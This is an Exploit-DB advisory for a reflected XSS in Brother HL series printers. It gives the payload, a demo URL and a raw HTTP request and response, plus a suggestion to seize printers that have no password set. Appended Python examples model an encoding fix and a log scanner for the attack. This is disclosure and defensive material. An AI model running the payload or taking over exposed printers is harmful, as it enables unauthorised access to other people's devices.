exploit-db-mirror/exploits/hardware/webapps/44839.md
Offensive Security ad4b4f15f3 DB: 2018-06-06

Exploit Title: [XSS at Brother HL series printers]

Date: [30.05.2018]

Exploit Author: [Huy Kha]

Vendor Homepage: [http://support.brother.com]

Software Link: [ Website ]

Version: Brother HL series printers.

Tested on: Mozilla Firefox

Reflected XSS Payload:

"--!><Svg/OnLoad=(confirm)(1)>"

Description: Start by searching for printers that have no password set.

When you see a yellow bar with ''Configure the password'', you can take over the whole printer simply by setting a password on it.

PoC:

To trigger the XSS you need to be logged into the web interface first.

Example:

  1. Go to the following URL: http://127.0.0.1/

  2. Log in with ''admin'' as the password

  3. Now intercept the request with Burp Suite

  4. The XSS exists in the url parameter of loginerror.html (loginerror.html?url=)

  5. Demo URL: http://127.0.0.1/etc/loginerror.html?url=%2Fnet%2Fnet%2Fservice_detail.html%3Fservice%3D%2522--!%253E%253CSvg%2FOnLoad%3D(confirm)(1)%253E%2522%26pageid%3D241

Request:

GET /etc/loginerror.html?url=%2Fnet%2Fnet%2Fservice_detail.html%3Fservice%3D%2522--!%253E%253CSvg%2FOnLoad%3D(confirm)(1)%253E%2522%26pageid%3D241 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: nl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

Response:

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 3389
Content-Type: text/html
Content-Language: nl
Connection: close
Server: debut/1.20
Pragma: no-cache

<html lang="nl" xmlns="http://www.w3.org/1999/xhtml" xml:lang="nl"><head> </head>

HL-L2340D series

Log in<Svg/OnLoad=(confirm)(1)>"&pageid=241"/>
    • Algemeen

</html>
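The response above shows the url value landing inside an attribute with no encoding, which is why the quote and the tag in the payload become live markup. The Python below is an added example, not the printer's firmware and not the author's code: it models that pattern with a hypothetical template (the form markup, function names and the "/" fallback are assumptions) and shows the two changes a fixed firmware needs, attribute-encoding the reflected value and accepting only a local path as the post-login destination.

```python
import html
from urllib.parse import urlsplit

# Reflected value taken from the advisory's payload above.
ADVISORY_PAYLOAD = '"--!><Svg/OnLoad=(confirm)(1)>"'

# Hypothetical stand-in for the login-error page template: the post-login
# destination is carried in a hidden form field. Not the printer's real markup.
TEMPLATE = '<form action="/login.html"><input type="hidden" name="url" value="%s"/></form>'


def render_vulnerable(url_param):
    """Weak pattern modelled on the response above: the query value is
    written into the attribute with no encoding at all."""
    return TEMPLATE % url_param


def encode_for_attribute(value):
    """Attribute-context encoding: &, <, >, " and ' become entities, so the
    value can never close the surrounding quotes or start a tag."""
    return html.escape(value, quote=True)


def is_local_path(url_param):
    """Accept only an absolute path on this host as a redirect target:
    no scheme, no host, and no protocol-relative '//' prefix."""
    parts = urlsplit(url_param)
    return (parts.scheme == "" and parts.netloc == ""
            and url_param.startswith("/") and not url_param.startswith("//"))


def render_hardened(url_param):
    """Both fixes together: validate the destination, then encode it.
    Anything that is not a local path falls back to the start page."""
    target = url_param if is_local_path(url_param) else "/"
    return TEMPLATE % encode_for_attribute(target)


def contains_live_markup(markup, tag="<Svg"):
    """True when the injected tag survives unencoded in the output."""
    return tag in markup


if __name__ == "__main__":
    print("vulnerable:", render_vulnerable(ADVISORY_PAYLOAD))
    print("hardened:  ", render_hardened(ADVISORY_PAYLOAD))
    print("encoded:   ", encode_for_attribute(ADVISORY_PAYLOAD))
```

Encoding alone already stops the breakout; the path check is the second layer, because a redirect-after-login parameter that accepts arbitrary URLs is an open redirect even when it is encoded correctly.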

How to fix it?: Update the printer to firmware 1.16 and set a new password.

Screenshot: https://imgur.com/a/3OVTSZ4
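Until the firmware update is applied, requests of the shape shown above can be picked out of a web-server or proxy access log. The scanner below is an added example, not part of the advisory and not a Brother tool: it percent-decodes each request target repeatedly and records in which decoding round a tag opener or an on*= handler first appears. The log lines are constructed for this example (line 1 carries the advisory's demo request, lines 2 and 3 are benign). For this PoC the handler is visible after one round but the `<Svg` tag only after the second, because the inner URL was encoded twice, so a scanner that decodes once would report only the handler.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines in Common Log Format. Line 1 carries the
# advisory's demo request; lines 2 and 3 are benign traffic invented here.
SAMPLE_LOG = """\
127.0.0.1 - - [30/May/2018:10:00:01 +0000] "GET /etc/loginerror.html?url=%2Fnet%2Fnet%2Fservice_detail.html%3Fservice%3D%2522--!%253E%253CSvg%2FOnLoad%3D(confirm)(1)%253E%2522%26pageid%3D241 HTTP/1.1" 200 3389
127.0.0.1 - - [30/May/2018:10:00:02 +0000] "GET /etc/loginerror.html?url=%2Fnet%2Fnet%2Fservice_detail.html%3Fservice%3Dhttp%26pageid%3D241 HTTP/1.1" 200 3389
127.0.0.1 - - [30/May/2018:10:00:03 +0000] "GET /general/status.html HTTP/1.1" 200 5120
"""

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Generic markup indicators, matched against every decoding round.
INDICATORS = {
    "tag": re.compile(r'<\s*/?[a-z]', re.IGNORECASE),              # <svg, <script, </a
    "event_handler": re.compile(r'\bon[a-z]+\s*=', re.IGNORECASE),  # onload=, onerror =
}


def decode_rounds(value, max_rounds=5):
    """Successive percent-decodings of value, index 0 being the raw string.
    Stops when a round changes nothing or max_rounds is reached."""
    chain = [value]
    for _ in range(max_rounds):
        nxt = unquote(chain[-1])
        if nxt == chain[-1]:
            break
        chain.append(nxt)
    return chain


def indicator_depths(target):
    """Map each indicator to the first decoding round in which it appears."""
    chain = decode_rounds(target)
    found = {}
    for name, pattern in INDICATORS.items():
        for depth, form in enumerate(chain):
            if pattern.search(form):
                found[name] = depth
                break
    return found


def scan_log(text):
    """Return (line number, request target, indicator depths) for every
    request whose target shows markup at some decoding depth."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        depths = indicator_depths(match.group(1))
        if depths:
            hits.append((lineno, match.group(1), depths))
    return hits


if __name__ == "__main__":
    for lineno, target, depths in scan_log(SAMPLE_LOG):
        print("line %d: %s -> %s" % (lineno, depths, target))
```

The depth is worth keeping in the alert: a value that only turns into markup after two or more decoding rounds is a strong sign of deliberate double encoding rather than an accidental angle bracket in a bookmark.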

Note: The vendor has been contacted on 30-5-2018.